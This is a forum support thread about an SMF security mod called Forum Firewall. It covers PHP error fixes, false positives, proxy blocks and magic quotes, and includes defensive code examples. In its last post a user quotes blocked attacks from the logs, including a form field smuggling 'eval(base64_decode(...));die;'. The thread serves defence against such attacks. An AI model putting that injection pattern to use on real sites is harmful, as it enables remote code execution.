
Forum Firewall

Started by butchs, January 15, 2011, 11:00:37 AM


MCK

Quote from: butchs on February 11, 2011, 02:17:06 AM
Yea.  This is why it is administrator editable; I was hoping admins would share new list items as they see them.  They can be found at sites that I prefer not to mention here.  In either event, when an update is found all you need to do is type it in the list.
:P

Thanks for confirming the ability to insert the updates into the settings window. Would you consider offering settings updates on a periodic or as-needed basis to your donating users? Since you know where to look and how to spot the new exploits, and how to translate these into settings that should go into Forum FireWall, I think you are best positioned to distribute these updates when needed. Would you consider this as a service please? As I see it, the FF-Mod is great as is and very capable, but I'm afraid over time it will become irrelevant as the script-kiddies move on to newer and different exploits. Sort of like running an anti-virus tool on your PC with no regular definition updates coming down. Thanks for considering this.

DarkBlizz

alright I'll look into that.  Another question, any idea how to fix these errors:


Quote: http://darkblizz.org/Forum2/index.php?pretty;action=profile&u=8426
8: Undefined index: host
File: /home/fluffybu/public_html/Forum2/Sources/ForumFirewall.php
Line: 279


276: // Check only if from different hosts
277: $referer_parts = array();
278: $referer_parts = parse_url($forumfirewall_data['referer']);
==>279: if($referer_parts['host'] != forumfirewall_get_env('HTTP_HOST')) {
280: $referer_attack = array();
281: $referer_attack = explode('|', $modSettings['forumfirewall_referer_attack']);
282: @$visitor_referer = queryspecialchars($forumfirewall_data['referer']);
283: foreach ($referer_attack as $attacks) {



Quote: http://darkblizz.org/Forum2/index.php?action=dlattach;attach=72;type=avatar
8: Undefined offset: 1
File: /home/fluffybu/public_html/Forum2/Sources/ForumFirewall.php
Line: 110

Quote: http://darkblizz.org/Forum2/index.php?action=dlattach;attach=72;type=avatar
8: Undefined offset: 2
File: /home/fluffybu/public_html/Forum2/Sources/ForumFirewall.php
Line: 107


//  check for dos
if ($dos_cond !== false) {
$time_diff =  '';
Line 107= $time_diff = (time() - $result[2]);

if ($time_diff >= 20) {  //  Min 20 seconds for test
Line 110= if  ((($result[1] + 1)/$time_diff) >= $modSettings['forumfirewall_trigger']) {
//  Fail dos test
$result[0] = '3';
forumfirewall_block($forumfirewall_data, $result);
return;
} } } } }


Quote: http://darkblizz.org/Forum2/index.php?pretty;action=register2
2: htmlspecialchars() expects parameter 1 to be string, array given
File: /home/fluffybu/public_html/Forum2/Sources/Subs-ForumFirewall.php
Line: 1045


1028: // Insert a new record modified for SMF 2.0 RC2
1029: function forumfirewall_insert($forumfirewall_data, $result) {
1030: global $txt, $modSettings, $db_prefix, $smcFunc;
1031:
1032: if (empty($forumfirewall_data)) return;
1033: if (!is_array($forumfirewall_data)) return;
1034: if (empty($result)) return;
1035:
1036: $request = $headers = $forumfirewall_ip = $request_method = '';
1037: $request_uri = $server_protocol = $user_agent = $referer = '';
1038:
1039:   $forumfirewall_ip = $forumfirewall_data['visitor_ip'];
1040: if (empty($forumfirewall_data['request_entity']))
1041: $request_method = $forumfirewall_data['request_method'];
1042: else {
1043: $request_method = $forumfirewall_data['request_method'];
1044: foreach ($forumfirewall_data['request_entity'] as $h => $v) {
==>1045: $request_method .= htmlspecialchars($h) . ": " . htmlspecialchars($v) . "\n\r"; }
1046: unset($v);
1047: }
1048: $request_uri = $forumfirewall_data['request_uri'];
1049: $server_protocol = $forumfirewall_data['server_protocol'];
1050: $user_agent = $forumfirewall_data['user_agent'];


~thanks
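The three notices quoted above have one shape: each line reads an array key or offset that may be absent (no 'host' in a relative Referer, a DoS row missing its count or timestamp, a nested POST field arriving as an array). An added example, not Forum Firewall's own code, showing defensive versions of those checks; the $result layout and field names follow the posted snippets, and the ff_* function names are assumed:

```php
<?php
// Added example, not Forum Firewall's own code: defensive versions of the three
// checks behind the notices quoted above. The $result layout and field names
// follow the posted snippets; the ff_* function names are assumed.

// Undefined index 'host' (line 279): parse_url() returns no 'host' key for a
// relative or malformed Referer and false for an unparsable one.
function ff_referer_is_foreign(array $data, $current_host) {
    $referer = isset($data['referer']) ? $data['referer'] : '';
    if ($referer === '') {
        return false;                       // no Referer at all: nothing to compare
    }
    $parts = parse_url($referer);
    $host  = (is_array($parts) && isset($parts['host'])) ? $parts['host'] : '';
    return strcasecmp($host, $current_host) !== 0;
}

// Undefined offset 1/2 (lines 107 and 110): the DoS row may lack its hit count
// or first-seen timestamp, so default them before dividing.
function ff_dos_triggered(array $result, $trigger, $now) {
    $hits  = isset($result[1]) ? (int) $result[1] : 0;
    $since = isset($result[2]) ? (int) $result[2] : $now;
    $diff  = $now - $since;
    if ($diff < 20) {                       // min 20 seconds for the test, as in the mod
        return false;
    }
    return (($hits + 1) / $diff) >= $trigger;
}

// htmlspecialchars() given an array (line 1045): nested POST fields such as
// options[] arrive as arrays, so flatten recursively before escaping.
function ff_flatten_entity(array $entity, $prefix = '') {
    $out = '';
    foreach ($entity as $h => $v) {
        $key = $prefix === '' ? (string) $h : $prefix . '[' . $h . ']';
        if (is_array($v)) {
            $out .= ff_flatten_entity($v, $key);
        } else {
            $out .= htmlspecialchars($key, ENT_QUOTES) . ': '
                  . htmlspecialchars((string) $v, ENT_QUOTES) . "\n";
        }
    }
    return $out;
}

// Constructed sample shaped like the register2 request from the post.
echo ff_flatten_entity(array('user' => 'alice', 'options' => array('notify' => '1')));
```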

butchs

Quote from: DarkBlizz on February 11, 2011, 12:04:20 PM
alright I'll look into that.  Another question, any idea how to fix these errors:

What version FF do you have?
I have been truly inspired by the SUGGESTIONS as I sit on my throne and contemplate the wisdom imposed upon me.

DarkBlizz


butchs

You do not have to post the code.  The mod should work fine but I will add them to the to do list.  Let me know if any of them repeat.

MCK

Hi Butchs, one of my Global Moderators is getting blocked with the following message : Request Entity Attack: %26!

I think he is connecting from his iPhone so I see the chances of his device being infected with malware low. Detail is below. Any thoughts on what I should do to resolve this issue? I am trying the Whitelist group idea in the meanwhile. Thanks for your help.

POSTtopic: 0 subject: History of Roland Guitar Synthesizers icon: xx sel_face: sel_size: sel_color: message: Many GK-13 products mentioned in this brief history of Roland Guitar Synthesizers: Translated by google http://translate.google.com/translate?hl=en&sl=ja&u=http://www.ikebe-gakki.com/web-ikebe/grandy_GR-GK/index.html&prev=/search%3Fq%3Dikebe%2Bgakki%2Bibanez%2Bguitar%26hl%3Den%26client%3Dsafari%26prmd%3Divnsfd&rurl=translate.google.com&twu=1 message_mode: 0 notify: 0 lock: 0 sticky: 0 move: 0 additional_options: 0 f0a59ef24: c90098bec7e35c7a28b76a041e23de20 seqnum: 12532999 /smf/index.php?action=post2;start=0;board=65 HTTP/1.1 Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 http://www.vguitarforums.com/smf/index.php?action=post;board=65.0   

butchs

He is accessing the site via a third party application "google translate".  The mod was not designed with that in mind.

MCK

Ok. I'll ask him if he can try going direct. I thought he did too but I'll check.

Meanwhile I have another problem. Legit user in New Zealand is coming through with broken IP so he is getting blocked. I tried the whitelist trick but this didn't work since he doesn't get that far into the system. So technically the f/w is doing its job. I just need to find out why he is coming through like this. When he checks his ip with http://www.whatismyip.com/ it is reported properly and it is 222.153.66.36.  He tried connecting with Linux, Win7 etc no change. He tried to reset his router and flush DNS and force new IP and that did not change a thing either.

Have you ever seen something like this? Thanks for any guidance you might have for me.

1.1   
GET /smf/index.php?board=84.0 HTTP/1.1 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MATP) http://www.vguitarforums.com/smf/index.php?action=post;topic=3099.0;last_msg=19919   
Invalid ip!

1.1   
GET /smf/index.php?board=84.0 HTTP/1.1 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MATP) http://www.vguitarforums.com/smf/index.php?action=post;topic=3099.0;last_msg=19919   
Invalid ip in Proxy list!

1.1   
POSTuser: gumtown passwrd: cookielength: -1 hash_passwrd: deleted /smf/index.php?action=login2 HTTP/1.1 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13 http://www.vguitarforums.com/smf/index.php?board=60.0   
Invalid ip!

1.1   
POSTuser: gumtown passwrd: cookielength: -1 hash_passwrd: deleted /smf/index.php?action=login2 HTTP/1.1 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13 http://www.vguitarforums.com/smf/index.php?board=60.0   
Invalid ip in Proxy list!

butchs

It looks like he is using a proxy that is hiding his ip or changing it.  He should try another proxy.

MCK

Ok. Will ask him about it but if that is the case wouldn't http://www.whatismyip.com/ see the same 1.1?

butchs

Nope.  If he is using a proxy that has been misconfigured or set up to spam he will get blocked.  Please do not try to force me to explain, doing so is a security risk.

MCK

Sure thing. I understand. Will collect as much info as possible and pass on to you via PM if need be. Thanks for your help.

intervention

In the ACP when I go to Forum Firewall > Settings there is a message at the top that says this:
SECURITY RISK: MAGIC_QUOTES ARE ON!
What exactly does this mean and how can I fix it? Any help would be very appreciated!

butchs

The mod detects them and warns about them; it is up to you to decide what to do.  Their use is controversial and they can cause slowdowns.  EDIT:  SMF RC5 SSI.PHP TRIES TO TURN THEM OFF.

More info here.

"MAGIC_QUOTES" are set in your "php.ini" and are not required by the default SMF package.  If you have the ability, you can turn them off.  Many hosts set them, and if you want them off try to be discreet because some of them are paranoid.
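The usual ways to act on that warning, as an added example that is not SMF's or the mod's own code: turn magic_quotes_gpc off in php.ini or .htaccess where the host allows it, and otherwise undo its escaping at request start so input is stored unescaped and escaped once on output (the ff_* names are assumed).

```php
<?php
// Added example, not SMF's or Forum Firewall's code. Preferred fixes first:
//   php.ini (needs host access):       magic_quotes_gpc = Off
//   .htaccess under Apache mod_php:    php_flag magic_quotes_gpc Off
// Fallback below: strip the automatic backslashes on every request. Magic
// quotes are not an injection defence; escape once, at the point of use.

function ff_magic_quotes_on() {
    // get_magic_quotes_gpc() was removed in PHP 8, where the answer is always Off.
    return function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc();
}

function ff_stripslashes_deep($value) {
    // Recurse into nested arrays such as options[] so every leaf is unescaped.
    return is_array($value) ? array_map('ff_stripslashes_deep', $value)
                            : stripslashes($value);
}

if (ff_magic_quotes_on()) {
    $_GET     = ff_stripslashes_deep($_GET);
    $_POST    = ff_stripslashes_deep($_POST);
    $_COOKIE  = ff_stripslashes_deep($_COOKIE);
    $_REQUEST = ff_stripslashes_deep($_REQUEST);
}

// Constructed sample: what magic_quotes_gpc would have made of O'Brien.
var_dump(ff_stripslashes_deep(array('name' => "O\\'Brien")));
```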

butchs

Upgrade to 2.0 RC5 and 1.1.13 (the lucky old one) and some bug fixes!
:)

MCK

I chose to remain at RC4 and apply the security patch for now. Your new release would still be compatible right?

butchs

Yes.

MCK

Quote from: butchs on February 13, 2011, 09:17:48 AM
Yes.

Thanks for your very prompt reply! Amazing support for your mod. Keep well.

ljunatic

I see the update for 1.1.13 is out. THANKS!


Should I uninstall and reinstall to get the upgrade?

MCK

Seeing some new type of attacks in my logs that I didn't see before.  In case this is of interest.

Request Entity Attack: base64_decode!

Detail : 81.94.196.51
POSTsend-contactus: 1 author_name: eval(base64_decode('...'));die; /smf/index.php//contact.php HTTP/1.0 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6

------------ next one below

Hack: cache!

Detail : 72.50.83.89
POST /smf/mobiquo/mobiquo.php?nocache=634331980101810000 HTTP/1.0 NativeHost file:///Applications/Install/9A096F03-F1DA-DF11-A844-00237DE2DB9E/Install/
